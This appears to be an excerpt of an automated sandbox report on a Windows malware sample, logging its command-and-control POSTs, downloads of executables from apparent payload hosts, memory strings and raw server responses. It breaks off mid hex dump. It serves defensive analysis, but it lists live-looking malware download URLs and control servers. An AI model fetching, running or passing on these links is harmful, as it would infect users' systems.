Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gbertcn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wtksenbbjr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kyvfadndk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qsvaicgadh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ykuckxuei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wider.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dajmdg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://homleb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://riqrjly.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://irljurmqm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pyemedcg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bifhr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unic11m.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ejorc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kbxyk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mrwsqu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jxnnlwoum.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cxbcmk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://unhjp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gckkxgv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ynbdlhhsfj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tlclh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xpnufbkn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/2150_1641729871_1812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://psidp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bveasvok.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qtcvnmqmix.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xvbahlaice.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fpwhnxup.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iqyfefv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bycco.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://weihpu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://amogohuigotuli.at/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: amogohuigotuli.at
Source: global traffic	HTTP traffic detected: GET /files/9993_1641737702_2517.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iffgi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gcjoh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: host-data-coin-11.com

Source: C:\Windows\explorer.exe	DNS query: name: bit.ly
Source: C:\Windows\explorer.exe	DNS query: name: bitly.com

Source: Joe Sandbox View	IP Address: 188.166.28.199 188.166.28.199
Source: Joe Sandbox View	IP Address: 148.0.74.229 148.0.74.229

Source: global traffic

TCP traffic: 192.168.2.3:49807 -> 185.7.214.171:8080

Source: svchost.exe, 00000014.00000002.405174140.00000246D08ED000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: B729.exe.13.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000014.00000002.405174140.00000246D08ED000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: B729.exe.13.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: svchost.exe, 00000014.00000003.378825069.00000246D0F93000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.379055077.00000246D0FB4000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: B729.exe.13.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 0000000D.00000000.311044019.000000000EE50000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.323664630.000000000EE50000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 0000000D.00000000.311044019.000000000EE50000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.323664630.000000000EE50000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.micr
Source: svchost.exe, 00000008.00000002.308057545.00000213CFA13000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000006.00000002.543597107.000001D194A44000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000006.00000002.543597107.000001D194A44000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000006.00000002.543597107.000001D194A44000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: 1F0B.exe, 0000001F.00000002.473714109.00000000041E1000.00000004.00000001.sdmp, 1F0B.exe, 0000001F.00000002.473902157.0000000004351000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000006.00000002.543597107.000001D194A44000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000006.00000002.543597107.000001D194A44000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000008.00000003.307629652.00000213CFA4B000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.308084699.00000213CFA3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000002.308147603.00000213CFA69000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307368032.00000213CFA67000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.307629652.00000213CFA4B000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308109021.00000213CFA4D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.308084699.00000213CFA3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000008.00000003.307737326.00000213CFA41000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308095122.00000213CFA42000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000003.307737326.00000213CFA41000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308095122.00000213CFA42000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307716871.00000213CFA46000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308100532.00000213CFA47000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000014.00000003.378825069.00000246D0F93000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.379055077.00000246D0FB4000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000008.00000003.307629652.00000213CFA4B000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307716871.00000213CFA46000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308100532.00000213CFA47000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307716871.00000213CFA46000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308100532.00000213CFA47000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000002.308109021.00000213CFA4D000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.307527535.00000213CFA61000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.308084699.00000213CFA3D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: B729.exe.13.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308090278.00000213CFA40000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.308084699.00000213CFA3D000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308057545.00000213CFA13000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.307731625.00000213CFA45000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.307701791.00000213CFA3F000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000003.307766407.00000213CFA39000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.
Source: svchost.exe, 00000008.00000003.285289521.00000213CFA30000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000003.307629652.00000213CFA4B000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.308109021.00000213CFA4D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000014.00000003.378825069.00000246D0F93000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.379055077.00000246D0FB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000014.00000003.378825069.00000246D0F93000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.379055077.00000246D0FB4000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000014.00000003.384055580.00000246D0FAE000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.384040858.00000246D0FC5000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.384024373.00000246D0FC5000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.384071016.00000246D1402000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.383987062.00000246D0F7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.384007011.00000246D0F8D000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown

DNS traffic detected: queries for: host-data-coin-11.com

Source: C:\Users\user\AppData\Local\Temp\EC9F.exe

Code function: 23_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

23_2_00404BE0

Source: global traffic	HTTP traffic detected: GET /32739433.dat?iddqd=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.233.81.115
Source: global traffic	HTTP traffic detected: GET /attachments/928021103304134716/928938539171864596/Dulling.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /3eHgQQR HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bit.ly
Source: global traffic	HTTP traffic detected: GET /a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitly.com
Source: global traffic	HTTP traffic detected: GET /files/2184_1641247228_8717.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic	HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
Source: global traffic	HTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unic11m.top
Source: global traffic	HTTP traffic detected: GET /install1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic	HTTP traffic detected: GET /files/2150_1641729871_1812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: GET /files/9993_1641737702_2517.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com

Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:52 GMTContent-Type: text/htmlContent-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 